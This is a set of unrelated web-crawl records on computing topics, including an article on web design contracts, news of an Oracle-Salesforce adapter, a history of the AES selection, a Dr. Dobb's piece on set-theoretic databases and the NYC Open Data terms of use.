In some methods, the format of the data on the storage disc is altered by changing data locations. This makes it impossible, however, for authorized users to make backup copies.
All of the software protection systems of which I am aware are either not sufficiently secure against cryptanalyst attack, require too much space on the microprocessor chip or are too slow. Further, hardware based systems for software protections of which I am aware require a separate hardware module for each software package that, of course, substantially increases costs and | 计算机 |
2015-48/3679/en_head.json.gz/9517 | 8/26/200905:45 PMCommentaryCommentary1 CommentComment NowLogin50%50%
Web Design Contracts 101: Don't Get SnookeredYou know your company needs help with its Web site, but how do you sign a Web design contract that will ensure you get what you need at a fair price? These tips can help!
Resource Nation provides how-to purchasing guides, tips for selecting business service providers, and a free quote-comparison service that allows business owners to compare price and service offerings in over 100 categories from Web site hosting to graphic design. Setting up an engaging online presence for your business is just about a given these days, right? Well, maybe not. According to a Nielsen Online study earlier this year, almost half of small businesses don't even have a Web site. What's worse, the vast majority of those that do have a Web site spend a mere three hours a week marketing it, spending less than 10% of their marketing dollars on Internet-based efforts. There's already plenty of great information out there to convince you why your company needs a well-designed Web site, but not every small business knows how to get there. Assuming you're going to hire a Web designer to create your site, how do you figure out what should be in the contract to make sure you get what you need at a fair price?
Law school courses break down contracts into three parts: Offer, Acceptance, and Consideration. For practical purposes, this means that a contract can take many forms. Approving a written e-commerce Web design proposal, making payments on invoices for design work, and other actions can all constitute binding agreements -- agreements whose terms might not be entirely in your favor. When it comes to Web design, it's important to have a formally drawn up, written agreement that outlines the basic responsibilities of both parties. The contract itself doesn't need to go into design specifics ("logo to contain pantone color X")-- in fact, many Web designers use service level agreements (SLAs) to describe the details of the design work. While it can be helpful to have an attorney draft this document, most designers have standard forms that they modify for each individual project. Here's an outline of what should be addressed in a typical Web design contract:
Statement of Work The Statement of Work (SOW) is a broad outline of the project scope, or a roadmap for the project. Since planning out the project can be a job in itself, many designers charge clients to prepare an SOW -- some call it a consulting fee or a project proposal. That's not unreasonable. Whether free or paid, the scope of work or work description should include
Number of pages and/or page templates to be created
Number of programs or scripts (for browser compatibility)
Integration of other programs/applications (form set up, social media integrations)
Amount of written content
Ongoing work (hosting, maintenance)
Some designers also include graphic design time, browser compatibility efforts, and the time it takes to train the client how to update the site themselves (for example, changing product information on an e-commerce site) in the scope of work. The statement of work should describe the project, not the site itself. Timeline
A project timeline is a key component of any Web design contract. Web design is a very collaborative process -- from a designer's point of view, the provider is never fully in control of the timeline because the client has to approve elements like layout, content, and other design work before the project can move forward. The contract should include "benchmarks" for the completion of certain items, and a specified duration for ongoing services like Web hosting (if it's provided by the designer). With your launch date in mind, you can work backwards with the designer to identify the dates when each element of the job should be completed. Be prepared for the designer to hold you to this timeline and charge more if approval deadlines are not met. Definitions
The way a contract is worded is very important. Avoid ambiguity at all costs -- if your contract has an upcharge for "major revisions" to the design plan, it should also define the differences between a "major revision" and a "minor revision." "Design elements," "design changes," and other terms can be pretty ambiguous, which can lead to misunderstandings and even legal action down the road if the designer/client relationship goes sour. You should never assume the meaning of an industry term that appears several times in a contract. If you're not absolutely sure what it means, get the definition included in the agreement.
Offer, Acceptance, and Consideration - Always Important Great article. It's always important to do business with firms you can trust. There are a lot of companies out there that offer website design services, however, finding one you want to do business with can often be a tall task. I always recommend trying to avoid lengthy contracts and beware of any jargon regarding minimum commitments.
My company, Home Instead Home Care in Laconia NH, has transitioned to having all of our website design done in-house by our parent company, so that has helped alleviate some of the issues we've had in the past. | 计算机 |
2015-48/3679/en_head.json.gz/9829 | Oracle builds a bridge to Salesforce.com with new ...
Oracle builds a bridge to Salesforce.com with new adapter
The adapter allows organizations to synchronize Salesforce.com and on-premises applications
Joab Jackson (IDG News Service) on 17 January, 2014 18:03
The Oracle Cloud Adapter for Salesforce provides a way of moving between Salesforce.com and Oracle applications
Kicking off an initiative to better bridge cloud services with its own software, Oracle has released an adapter that allows organizations to copy data between their Salesforce.com accounts and Oracle software.
"We're encapsulating standard Web services calls into easier-to-use adapters," said Demed L'Her, Oracle vice president of product management.
The Oracle Cloud Adapter for Salesforce is an extension of the Oracle SOA Suite, Oracle's software for integrating enterprise applications through the use of Web services standards.
It will be the first in a number of connectors that the company plans to offer that connect cloud services with on-premises Oracle applications, L'Her said. The company already offers over 300 adapters for connecting different Oracle and non-Oracle enterprise software packages and now the company will extend this catalog to include adapters for cloud services.
Although Oracle and Salesforce.com are fierce competitors in the enterprise software market, the two companies agreed to a partnership last June to facilitate greater interoperability between both company's products and services.
The adapter is not the result of that partnership, however, but rather part of Oracle's ongoing efforts to help its customers integrate Oracle software with third-party products and services, L'Her said.
When an organization needs to copy and synchronize data between a Salesforce.com service and an on-premises application, an administrator or developer sets up a connection between the two. Salesforce.com offers access for third-party applications through a number of different APIs (application programming interfaces), including SOAP (Simple Object Access Protocol), a Web services protocol used for exchanging information over a network. .
While Web services provide the protocols for different enterprise applications to interact with one another, they still require a fair amount of manual configuration, which can be time-consuming and difficult to execute correctly.
"Web services do solve the interoperability problems, but they do not make everything consistent. So you still need to piece a lot of things together," L'Her said.
Another issue is that each enterprise software vendor or cloud service provider implements Web services calls in a slightly different way, L'Her said.
"Typically, in order to connect to Salesforce.com, you need to authenticate, then pass a token for authorization, and then perhaps use a SOAP call. And all that will be different when you move to RightNow, and it will be different when you move to NetSuite," L'Her said.
The Salesforce adapter provides a way to establish a connection to Salesforce.com using a point-and-click GUI, which will also be used for future cloud adapters, standardizing the process of establishing new connections between on-premises software and cloud services.
Once the adapter is installed, an administrator can see all the business objects within their Salesforce.com accounts and route any changes within these objects to any other application connected to the SOA Suite.
One common-use case for the adapter, for instance, would be to synchronize customer data from two different business units within an organization, one using Salesforce.com and the other using the Oracle E-Business Suite. Perhaps both units deal with many of the same customers and the company needs to establish a master record for each customer.
Oracle expects that the majority of data exchanges using the adapter will be in real-time, although batch mode processing is also an option. The adapter detects when a change in a database is made in one of the applications and replicates that change to the other application. The Oracle Credential Store Framework manages user account credentials, so sensitive passwords don't need to be sent across the network.
Oracle will release other adapters as it sees demand for them from customers. The company is now working on one for the Oracle RightNow CRM (customer relationship management) software.
Oracle will also release a software development kit to help organizations build their own cloud adapters.
Tags Enterprise service bussesSalesforce.commiddlewaresoftwareEnterprise application integrationcloud computinginternetdata integrationInfrastructure servicesOracleApplication servers | 计算机 |
2015-48/3679/en_head.json.gz/10154 | Working together for standards The Web Standards Project
Search WaSP
safari extensions
By Anders Pearson | July 8th, 2004 | Filed in Browsers Skip to comment form
Dave Hyatt and the Safari team have been busy lately adding support for a number of extensions to html to be used by the upcoming Safari RSS reader and Dashboard. On the list is IE’s contenteditable, along with a slider widget, search fields, a composite attribute on the <img/> element, and a new <canvas/> element.
This has generated a fair amount of concern in the web developer community. Tim Bray and Eric Meyer both worry that this heralds a return to the bad old days of the browser wars with everyone just ignoring the standards and making things up for themselves. Specifically, they point out that instead of trying to put new elements into HTML, they could have used XHTML, which, being XML, is designed to be extensible with namespaces or at the very least used a different DOCTYPE. Dave has responded with an explanation of why they did things the way they did. Dave argues that the XML and namespaces approach has implementation issues. I’m not enough of an expert on browser internals to say whether this is a cop-out or not, so I guess we’ll have to trust him on that. He also says that:
“However, this would have dramatically increased the complexity of crafting Dashboard widgets. People know how to write HTML, but most of those same people have never written an XML file, and namespaces are a point of confusion.
Would the increase in complexity in the markup really be that much of an obstacle? Dashboard widgets seem to me like the kind of thing that would be written by a programmer, or at least have an expectation of being a little more strict than a regular web-page. Besides, web developers have historically shown an incredible aptitude for blindly copy-pasting markup. There’s an awful lot of RDF out on the web. Somebody had to write it. He also doesn’t address the suggestion of at the very least creating their own DTD with their extensions and using a DOCTYPE that points at that DTD. This would go a long way towards alleviating the whole “polluting HTML” concern. I haven’t really seen any actual real-world examples of this markup in action, so for all I know they’ve already done this or are planning to.
While I can understand and respect the following:
“In other words, in an ideal world where we had two years to craft Dashboard, maybe we could have used XHTML and SVG, but we aren’t living in that ideal world. We can basically manage only one “huge” layout engine feature in a development cycle, and given our developer feedback the choice of HTML editing as the feature to focus on this cycle was clear. We would still love to implement SVG and XSLT and other great technologies in the future, but we simply can’t do everything at once.”
It does sound an awful lot like the “Our customers don’t care about standards support. They want fancy new features” excuse that we’ve been hearing from browser vendors for years and that the WaSP has been actively trying to debunk.
The fact that they’re actively working with other browser makers, with the WHAT WG, and seem to have intentions of eventually getting the extensions approved by the W3C is somewhat reassuring.
Overall, though, it’s not that big a deal. Safari does an excellent (not perfect) job of supporting the various HTML, XHTML, and CSS specs as they’re written and ultimately, that’s what’s most important. If developers don’t want to use the extensions, they don’t have to. The vision that the WaSP has been most adamant about is that developers should be able to build sites that conform to the published specs and have them Just WorkTM in every browser. If browsers want to support additional proprietary extensions on top of that, they’re free to do so and the rest of us are free to ignore them.
Back to Top All of the entries posted in WaSP Buzz express the opinions of their individual authors. They do not necessarily reflect the plans or positions of the Web Standards Project as a group.
This site is valid XHTML 1.0 Strict, CSS | Get Buzz via RSS or Atom | Colophon | Legal | 计算机 |
2015-48/3679/en_head.json.gz/10239 | Advanced Encryption Standard process
The Advanced Encryption Standard (AES), the symmetric block cipher ratified as a standard by National Institute of Standards and Technology of the United States (NIST), was chosen using a process lasting from 1997 to 2000 that was markedly more open and transparent than its predecessor, the aging Data Encryption Standard (DES). This process won praise from the open cryptographic community, and helped to increase confidence in the security of the winning algorithm from those who were suspicious of backdoors in the predecessor, DES.
A new standard was needed primarily because DES has a relatively small 56-bit key which was becoming vulnerable to brute force attacks. In addition, the DES was designed primarily for hardware and is relatively slow when implemented in software.[1] While Triple-DES avoids the problem of a small key size, it is very slow even in hardware; it is unsuitable for limited-resource platforms; and it may be affected by potential security issues connected with the (today comparatively small) block size of 64 bits.
1 Start of the process
2 Rounds one and two
3 Selection of the winner
Start of the process[edit]
On January 2, 1997, NIST announced that they wished to choose a successor to DES to be known as AES. Like DES, this was to be "an unclassified, publicly disclosed encryption algorithm capable of protecting sensitive government information well into the next century."[2] However, rather than simply publishing a successor, NIST asked for input from interested parties on how the successor should be chosen. Interest from the open cryptographic community was immediately intense, and NIST received a great many submissions during the three month comment period.
The result of this feedback was a call for new algorithms on September 12, 1997.[3] The algorithms were all to be block ciphers, supporting a block size of 128 bits and key sizes of 128, 192, and 256 bits. Such ciphers were rare at the time of the announcement; the best known was probably Square.
Rounds one and two[edit]
In the nine months that followed, fifteen different designs were created and submitted from several different countries. They were, in alphabetical order: CAST-256, CRYPTON, DEAL, DFC, E2, FROG, HPC, LOKI97, MAGENTA, MARS, RC6, Rijndael, SAFER+, Serpent, and Twofish.
In the ensuing debate, many advantages and disadvantages of the different candidates were investigated by cryptographers; they were assessed not only on security, but also on performance in a variety of settings (PCs of various architectures, smart cards, hardware implementations) and on their feasibility in limited environments (smart cards with very limited memory, low gate count implementations, FPGAs).
Some designs fell due to cryptanalysis that ranged from minor flaws to significant attacks, while others lost favour due to poor performance in various environments or through having little to offer over other candidates. NIST held two conferences to discuss the submissions (AES1, August 1998 and AES2, March 1999), and in August 1999 they announced [4] that they were narrowing the field from fifteen to five: MARS, RC6, Rijndael, Serpent, and Twofish. All five algorithms, commonly referred to as "AES finalists", were designed by cryptographers considered well-known and respected in the community. The AES2 conference votes were as follows:
Rijndael: 86 positive, 10 negative | 计算机 |
2015-48/3679/en_head.json.gz/10340 | EncryptionIdentifying Encryption ItemsRegistrationClassificationReportingLicense ApplicationsEncryption FAQs
Encryption Links
Encryption Export Controls, 75 Fed. Reg. 36,482 (June 25, 2010)
Section 740.17 – Encryption Commodities, Software, and Technology (ENC)
Supplement No. 1 to Part 740 – Country Groups
Supplement No. 3 to Part 740 – License Exception ENC Favorable Treatment Countries
Section 742.15 – Encryption Items
Supplement No. 5 to Part 742 – Encryption Registration
Supplement No. 6 to Part 742 – Technical Questionnaire for Encryption Items
Supplement No. 8 to Part 742 – Self-Classification Report for Encryption Items
Supplement No. 2 to Part 748 – Unique Application and Submission Requirements
Supplement No. 1 to Part 774, Category 5, Part II – Information Security
BIS Privacy Policy Statement | Print | The kinds of information BIS collects
Automatic Collections - BIS Web servers automatically collect the following information:
The IP address of the computer from which you visit our sites and, if available, the domain name assigned to that IP address;
The type of browser and operating system used to visit our Web sites;
The date and time of your visit;
The Internet address of the Web site from which you linked to our sites; and
The pages you visit.
In addition, when you use our search tool our affiliate, USA.gov, automatically collects information on the search terms you enter. No personally identifiable information is collected by USA.gov.
This information is collected to enable BIS to provide better service to our users. The information is used only for aggregate traffic data and not used to track individual users. For example, browser identification can help us improve the functionality and format of our Web site.
Submitted Information: BIS collects information you provide through e-mail and Web forms. We do not collect personally identifiable information (e.g., name, address, phone number, e-mail address) unless you provide it to us. In all cases, the information collected is used to respond to user inquiries or to provide services requested by our users. Any information you provide to us through one of our Web forms is removed from our Web servers within seconds thereby increasing the protection for this information.
Privacy Act System of Records: Some of the information submitted to BIS may be maintained and retrieved based upon personal identifiers (name, e-mail addresses, etc.). In instances where a Privacy Act System of Records exists, information regarding your rights under the Privacy Act is provided on the page where this information is collected.
Consent to Information Collection and Sharing: All the information users submit to BIS is done on a voluntary basis. When a user clicks the "Submit" button on any of the Web forms found on BIS's sites, they are indicating they are aware of the BIS Privacy Policy provisions and voluntarily consent to the conditions outlined therein.
How long the information is retained: We destroy the information we collect when the purpose for which it was provided has been fulfilled unless we are required to keep it longer by statute, policy, or both. For example, under BIS's records retention schedule, any information submitted to obtain an export license must be retained for seven years.
How the information is used: The information BIS collects is used for a variety of purposes (e.g., for export license applications, to respond to requests for information about our regulations and policies, and to fill orders for BIS forms). We make every effort to disclose clearly how information is used at the point where it is collected and allow our Web site user to determine whether they wish to provide the information.
Sharing with other Federal agencies: BIS may share information received from its Web sites with other Federal agencies as needed to effectively implement and enforce its export control and other authorities. For example, BIS shares export license application information with the Departments of State, Defense, and Energy as part of the interagency license review process.
In addition, if a breach of our IT security protections were to occur, the information collected by our servers and staff could be shared with appropriate law enforcement and homeland security officials.
The conditions under which the information may be made available to the public: Information we receive through our Web sites is disclosed to the public only pursuant to the laws and policies governing the dissemination of information. For example, BIS policy is to share information which is of general interest, such as frequently asked questions about our regulations, but only after removing personal or proprietary data. However, information submitted to BIS becomes an agency record and therefore might be subject to a Freedom of Information Act request.
How e-mail is handled: We use information you send us by e-mail only for the purpose for which it is submitted (e.g., to answer a question, to send information, or to process an export license application). In addition, if you do supply us with personally identifying information, it is only used to respond to your request (e.g., addressing a package to send you export control forms or booklets) or to provide a service you are requesting (e.g., e-mail notifications). Information we receive by e-mail is disclosed to the public only pursuant to the laws and policies governing the dissemination of information. However, information submitted to BIS becomes an agency record and therefore might be subject to a Freedom of Information Act request.
The use of "cookies": BIS does not use "persistent cookies" or tracking technology to track personally identifiable information about visitors to its Web sites.
Information Protection: Our sites have security measures in place to protect against the loss, misuse, or alteration of the information on our Web sites. We also provide Secure Socket Layer protection for user-submitted information to our Web servers via Web forms. In addition, staff is on-site and continually monitor our Web sites for possible security threats.
Links to Other Web Sites: Some of our Web pages contain links to Web sites outside of the Bureau of Industry and Security, including those of other federal agencies, state and local governments, and private organizations. Please be aware that when you follow a link to another site, you are then subject to the privacy policies of the new site.
Further Information: If you have specific questions about BIS' Web information collection and retention practices, please use the form provided.
Policy Updated: April 6th, 2015 10:00am | 计算机 |
2015-48/3679/en_head.json.gz/10564 | @CloudExpo Authors: Elizabeth White, Brian Daleiden, Mav Turner, Flint Brenton, Liz McMillan Related Topics: Agile Computing, Release Management Agile Computing: Blog Feed Post
Twitter: It’s Not Just About Lunch
Twitter awareness is growing by leaps and bounds
By William Arruda
August 2, 2009 06:44 PM EDT
A recent Sprint commercial about the “Now Network” noted that 26% of viewers had no idea what “twittering on Twitter” means. Yet, it’s clear that Twitter awareness is growing by leaps and bounds. Of course, this doesn’t mean opinions about Twitter are all positive.
Many still hold the view expressed in this Twouble with Twitters video. As well, as Steven Johnson stated in his favorable Time magazine piece, “The one thing you can say for certain about Twitter is that it makes a terrible first impression… It's not as if we were all… saying, ‘If only there were a technology that would allow me to send a message to my 50 friends, alerting them in real time about my choice of breakfast cereal.’" In fact, when I first started using Twitter, I wondered, to borrow words from Andy Warhol, if Twitter was not just a way to become more “deeply superficial.”
All that is changing.
Google “Twitter” and you’ll find more than six hundred million results – with more than 100 million of them pertaining to using Twitter in your career. Explore business use of Twitter and you’ll find this online social networking tool is rapidly being adapted by all kinds of businesses for marketing, promotion, and customer service. Finally, if that’s not enough, you may want to check out the forthcoming book by Shel Israel, Twitterville: How Businesses Can Thrive in the New Global Neighborhoods. If you want an early peek, read the introduction to Shel’s book at his blog; there, you’ll also find his Twitterville Notebook entries.
Frankly, while I’d recognized early the career value of Twitter, I had not been actively promoting it to people in career transition. Now, I do. Here are three reasons why:
CIO, CTO & Developer Resources Career/Business Intelligence: Twitter is a great way to find and follow companies to learn how they interact with others and what matters to them. You’ll find that many people also post links to useful industry information published elsewhere on the web. More importantly, you can begin learning about and interacting with thought leaders in your industry.
Networking: Clearly, Twitter offers a way to interact with people. If they’re not already there, you can invite people you know to connect and interact on Twitter. Even better, you can interact with anyone – either indirctly via a tweet using their Twitter name, or via Direct Message, if they follow you. And just as in life, in this “brave new world of digital intimacy,” the more you interact with others the better chance you have of building real relationships.
Professional Visibility and Crediblity: While it’s a good idea to use multiple approaches to establish your professional online identity, Twitter is a powerful addition to your suite of social media tools. In a real way, by posting your professional perspectives, exchanging views with others, and linking to helpful information (including your own blog posts), Twitter can be the backbone of your personal brand online.
So, if you’re not yet on Twitter, learn the basics and set up an account, You can probably do it during lunch hour.
Cross-posted at Threshold Consulting Read the original blog entry...
Published August 2, 2009 Reads 22,216 Copyright © 2009 SYS-CON Media, Inc. — All Rights Reserved.
Publishing Synergy: Blog, Twitter and Ulitzer
Thank You Twitter Hackers
Four Personal Branding Tools any Professional Should Consider in 2009 More Stories By William Arruda
Dubbed 'The Personal Branding Guru’ by Entrepreneur magazine, William Arruda is a pioneering brand strategist, speaker, author and founder of Reach Personal Branding. He is credited with turning the concept of personal branding into a global industry.
William delivers keynotes and workshops on the transformative power of personal branding for some of the world’s most successful companies. He energizes and motivates his audiences—and his private clients include some of the world’s most influential leaders. As a thought-leader, William is a sought-after spokesperson on personal branding, social media and leadership. He has appeared on BBC TV, the Discovery Channel and Fox News Live and he’s been featured in countless publications, including Time Magazine, the Wall Street Journal, Forbes and the New York Times. William is the coauthor of the bestselling book Career Distinction. He is a member of the International Coach Federation and the National Speakers Association. He holds a Master’s Degree in Education. | 计算机 |
2015-48/3679/en_head.json.gz/11402 | CloudMobileParallel.NETJVM LanguagesC/C++ToolsDesignTestingWeb DevJolt Awards Ken North Dr. Dobb's Bloggers
Bio | Archive Ken North
David Childs authored pioneering research about implementing set operations that enabled a programmer to approach the data storage and retrieval problem from a logical model, rather than a physical model of the data.
A thorough examination of databases and data management will include many flavors of data and information models, including conceptual, logical, physical, mathematical, and application models. Database technology is constantly evolving, with new approaches and refinements to existing platforms. The choice of a data access solution depends in part on the underlying data model; whether a data store operates with sets, graphs or other types of data.Data management technology has undergone evolutionary development since the 1950s. The modern database management system (DBMS) represents mature, but not static, technology. Besides the emergence of new approaches to data persistence, there are continued refinements to mature DBMS platforms.
Today's data stores implement a variety of data models, including graphs, sets, collections, arrays, cubes and other variants, including the hierarchical data model, relational model, network data model (CODASYL), trees, nested sets, adjacency lists and object stores. The index sequential access method (ISAM), key-value data stores and record management systems have also been implemented in various forms for decades.
The concept of a data store that supported set operations such as union, intersection, domain and range emerged in the 1960s, based of course on Georg Cantor's set theory published in the 19th century. In 1968, D.L. Childs, then at the University of Michigan, wrote seminal papers about set-theoretic data structures that provided data independence, meaning an application did not have to know the physical structure of the data. During that era of first-generation databases (see CODASYL 1968 Survey of Data Base Systems), data access typically required the use of pointers and descriptions of physical data structures. Childs authored pioneering research about implementing set operations that enabled a programmer to approach the data storage and retrieval problem from a logical view, rather than a physical view of the data. His March 1968 paper, "Description of A Set-Theoretic Data Structure", explained that programmers can query data using set-theoretic expressions instead of navigating through fixed structures.
"A set-theoretic data structure (STDS) is virtually a 'floating' or pointer-free structure allowing quicker access, less storage, and greater flexibility than fixed or rigid structures that rely heavily on internal pointers or hash-coding, such as 'associative or relational structures,' 'list structures,' 'ring structures,' etc. An STDS relies on set-theoretic operations to do the work usually allocated to internal pointers. A question in an STDS will be a set-theoretic expression. Each set in an STDS is completely independent of every other set, allowing modification of any set without perturbation of the rest of the structure; while fixed structures resist creation, destruction, or changes in data. An STDS is essentially a meta-structure, allowing a question to 'dictate' the structure or data-flow. A question establishes which sets are to be accessed and which operations are to be performed within and between these sets. In an STDS there are as many 'structures' as there are combinations of set-theoretic operations; and the addition, deletion, or change of data has no effect on set-theoretic operations, hence no effect on the 'dictated structures.' Thus in a floating structure like an STDS the question directs the structure, instead of being subservient to it."
In August 1968, Childs published "Feasibility of a Set-Theoretic Data Structure. A General Structure Based on a Reconstituted Set-Theoretic Definition for Relations".
"This paper is motivated by an assumption that many problems dealing with arbitrarily related data can be expedited on a digital computer by a storage structure which allows rapid execution of operations within and between sets of datum names. In order for such a structure to be feasible, two problems must be considered: (1) the structure should be general enough that the sets involved may be unrestricted, thus allowing sets of sets of sets...; sets of ordered pairs, ordered triples...; sets of variable length n-tuples, n-tuples of arbitrary sets; etc.; (2) the set-operations should be general in nature, allowing any of the usual set theory operations between sets as described above, with the assurance that these operations will be executed rapidly. A sufficient condition for the latter is the existence of a well-ordering relation on the union of the participating sets. These problems are resolved in this paper with the introduction of the concept of a 'complex' which has an additional feature of allowing a natural extension of properties of binary relations to properties of general relations."
The Federal government, including the Defense Advanced Research Projects Agency (DARPA), frequently funded computer science research and development during that era. One such effort was the University of Michigan's Research in the Conversational Use of Computers (CONCOMP) project for which Childs did his work on set-theoretic data structures. During that era, DARPA also funded development of packet-switched network technology and the ARPAnet, the forerunner of today's Internet. Childs' CONCOMP papers were available only to 'qualified requesters' although Childs presented the August 1968 paper at that year's Congress of the International Federation for Information Processing (IFIP). Those 1968 papers did not receive the broad dissemination of research papers published today via the Internet. Nonetheless Dr. Edgar F. Codd, who'd gotten his PhD at the University of Michigan, cited Childs' paper on set-theoretic data structures in his June 1970 paper about the relational model.
Many persons who had not discovered Childs' papers erroneously believed the foundation of data independence and set-theoretic operations over data had been laid by Codd. Following Codd's 1970 paper on the relational model, other database researchers published papers that discussed the concept of data independence. In 1971, Chris Date and Paul Hopewell authored "Storage Structures and Physical Data Independence" for the ACM Workshop on Data Definition, Access and Control. The authors wrote about data independence being integral to the relational model:
"Such data independence was explicitly called out as one of the major objectives of the relational model by Ted Codd in 1970 in his famous paper "A Relational Model of Data for Large Shared Data Banks" (Communications of the ACM 13, No. 6, June 1970)."
Dr. Michael Stonebreaker's 1974 paper, "A Functional View of Data Independence", cited Codd's 1970 paper and Date's 1971 paper, but not Childs' papers in 1968. Similarly I've found other publications that credit the notion of data independence or physical data independence to Codd and Date, without referring to Childs' papers.
During the 1990s, the advent of object databases and object-oriented programming frequently surfaced topics related to the relational model and data independence in articles, conference presentations and online discussions. Prominent defenders of relational fidelity included Chris Date, David McGoveran, Hugh Darwen and Fabian Pascal. In debates about the relational model (then and now), data independence and relational algebra are often cited as key factors that differentiate Codds' relational model from less formal approaches. Relational algebra includes the group of set-theoretic operations that provide mathematical underpinnings to the relational model. With the emergence of the Internet, Childs' papers are now widely-available to researchers. We now know Childs' pioneered concepts of data independence and set-theoretic operations over data. The works of Georg Cantor and D.L. Childs provided groundwork that enabled Dr. Edgar F. Codd to develop the relational model. Several years ago I had an e-mail exchange about this with Don Chamberlin, the co-inventor of SQL who worked with the late Dr. Codd at IBM. He acknowledged Childs' contribution: i<>"Thanks for the reminder of David Childs' work. As you have observed, modern relational databases owe a lot to Childs and he deserves recognition for this early and pioneering work."
Since his pioneering work on set-theoretic data structures, David Childs has published papers about extended set processing, XML processing and other subjects that will be a topic for the future.
Part 2: "Laying the Foundation" It will be interesting to watch whether set-store data access architectures become high fashion for processing large data sets.
Part 3: "Information Density, Mathematical Identity, Set Stores and Big Data" David Childs authored pioneering research about implementing set operations that enabled a programmer to approach the data storage and retrieval problem from a logical model, rather than a physical model of the data. Related Reading
Application Intelligence For Advanced DummiesAppGyver AppArchitect 2.0 AppearsDevart dbForge Studio For MySQL With Phrase CompletionMirantis Releases Free Developer EditionMore News» Commentary
Application Intelligence For Advanced DummiesThe Touch of a ButtonFarewell, Dr. Dobb'sXamarin Editions of IP*Works! & IntegratorMore Commentary» Slideshow
Jolt Awards 2015: Coding ToolsJolt Awards: Coding ToolsNoSQL Options ComparedDeveloper Reading List: The Must-Have Books for JavaScriptMore Slideshows» Video
First-Class Functions in Java 8Intel's Silvermont MicroarchitectureSolve for TomorrowConnected VehiclesMore Videos» Most Popular
A Simple and Efficient FFT Implementation in C++: Part IiOS Data Storage: Core Data vs. SQLiteSDLC: SDLC models Advantages & disadvantagesBuilding GUI Applications in PowerShellMore Popular» More Insights
White Papers The 2015 Threat Report Using Anomalies in Crash Reports to Detect Unknown Threats More >> Reports SaaS and E-Discovery: Navigating Complex Waters SaaS 2011: Adoption Soars, Yet Deployment Concerns Linger More >> Webcasts Real results: Speeding quality application delivery with DevOps [in financial services] How to Prep and Modernize IT For Cloud Computing More >> INFO-LINK
5 Reasons to Choose an Open Platform for Cloud Architecting Private and Hybrid Cloud Solutions: Best Practices Revealed How to Prep and Modernize IT For Cloud Computing Big Data and Customer Interaction Analytics: How To Create An Innovative Customer Experience Developing a User-Centric Secure Mobile Strategy: It's in Reach More Webcasts>>
Hard Truths about Cloud Differences Return of the Silos SaaS and E-Discovery: Navigating Complex Waters SaaS 2011: Adoption Soars, Yet Deployment Concerns Linger Research: State of the IT Service Desk More >> | 计算机 |
2015-48/3679/en_head.json.gz/11726 | Research shows that computers can match humans in art analysis
Release Date: March 18, 2013
Jane Tarakhovsky is the daughter of two artists, and it looked like she was leaving the art world behind when she decided to become a computer scientist. But her recent research project at Lawrence Technological University has demonstrated that computers can compete with art historians in critiquing painting styles.
While completing her master’s degree in computer science earlier this year, Tarakhovsky used a computer program developed by Assistant Professor Lior Shamir to demonstrate that a computer can find similarities in the styles of artists just as art critics and historian do.
In the experiment, published in the ACM Journal on Computing and Cultural Heritage and widely reported elsewhere, Tarakhovsky and Shamir used a complex computer algorithm to analyze approximately1,000 paintings of 34 well-known artists, and found similarities between them based solely on the visual content of the paintings. Surprisingly, the computer provided a network of similarities between painters that is largely in agreement with the perception of art historians.
For instance, the computer placed the High Renaissance artists Raphael, Da Vinci, and Michelangelo very close to each other. The Baroque painters Vermeer, Rubens and Rembrandt were placed in another cluster.
The experiment was performed by extracting 4,027 numerical image context descriptors – numbers that reflect the content of the image such as texture, color, and shapes in a quantitative fashion. The analysis reflected many aspects of the visual content and used pattern recognition and statistical methods to detect complex patterns of similarities and dissimilarities between the artistic styles. The computer then quantified these similarities.
According to Shamir, non-experts can normally make the broad differentiation between modern art and classical realism, but they have difficulty telling the difference between closely related schools of art such as Early and High Renaissance or Mannerism and Romanticism.
“This experiment showed that machines can outperform untrained humans in the analysis of fine art,” Shamir said.
Tarakhovsky, who lives in Lake Orion, is the daughter of two Russian artists. Her father was a member of the former USSR Artists. She graduated from an art school at 15 years old and earned a bachelor’s degree in history in Russia, but has switched her career path to computer science since emigrating to the United States in 1998.
Tarakhovsky utilized her knowledge of art to demonstrate the versatility of an algorithm that Shamir originally developed for biological image analysis while working on the staff of the National Institutes of Health in 2009. She designed a new system based on the code and then designed the experiment to compare artists.
She also has used the computer program as a consultant to help a client identify bacteria in clinical samples.
“The program has other applications, but you have to know what you are looking for,” she said.
Tarakhovsky believes that there are many other applications for the program in the world of art. Her research project with Shamir covered a relatively small sampling of Western art. “this is just the tip of the iceberg,” she said.
At Lawrence Tech she also worked with Professor CJ Chung on Robofest, an international competition that encourages young students to study science, technology, engineering and mathematics, the so-called STEM subjects.
“My professors at Lawrence Tech have provided me with a broad perspective and have encouraged me to go to new levels,” she said.
She said that her experience demonstrates that women can succeed in scientific fields like computer science and that people in general can make the transition from subjects like art and history to scientific disciplines that are more in demand now that the economy is increasingly driven by technology.
“Everyone has the ability to apply themselves in different areas,” she said. | 计算机 |
2015-48/3679/en_head.json.gz/12423 | NYC Open Data
HomeDevelopers
Data Mine
About NYC Open Data
Contact NYC Open Data
Mayor's Office of Operations
Search all NYC.gov websites
Research & Analytics
Data Sets Available
Datasets (All Categories)
NYC's Data Catalog
Suggest a Dataset
Nominate and Discuss possible data
Mayor's Management Report
Citywide Performance Scorecard
Getting Started with Our APIs
Access Data with the SODA API
API Endpoints
Find API endpoints for our data
API Queries
Discover how to get just the data you want
NYC Developer Portal
More NYC Government APIs
NYC DoITT
NYC Information Technology and Telecommunications
NYC MoDA
NYC Mayor's Office of Data Analytics
NYC Digital
Learn more about NYC Open Data
Read the terms of use for the data on this site
Technical Standards Manual
Read the law, policies, and standards that help us make data public
Socrata Support
Get technical support from Socrata
Open Data FAQs
Site Analytics
See usage, access rates and other key metrics
The following Terms of Use apply to visitors to the NYC OpenData portal and application developers who obtain City data through this single web portal:
By accessing data sets and feeds available through the NYC OpenData portal (or the "Site"), the user agrees to all of the Terms of Use of NYC.gov as well as the Privacy Policy for NYC.gov. The user also agrees to any additional terms of use defined by entities providing data or feeds through the Site. Entities providing data include, without limitation, agencies, bureaus, offices, departments and other discrete entities of the City of New York ("City"). Public data sets made available on the NYC OpenData portal are provided for informational purposes. The City does not warranty the completeness, accuracy, content, or fitness for any particular purpose or use of any public data set made available on the NYC OpenData portal, nor are any such warranties to be implied or inferred with respect to the public data sets furnished therein.
The City is not liable for any deficiencies in the completeness, accuracy, content, or fitness for any particular purpose or use of any public data set, or application utilizing such data set, provided by any third party.
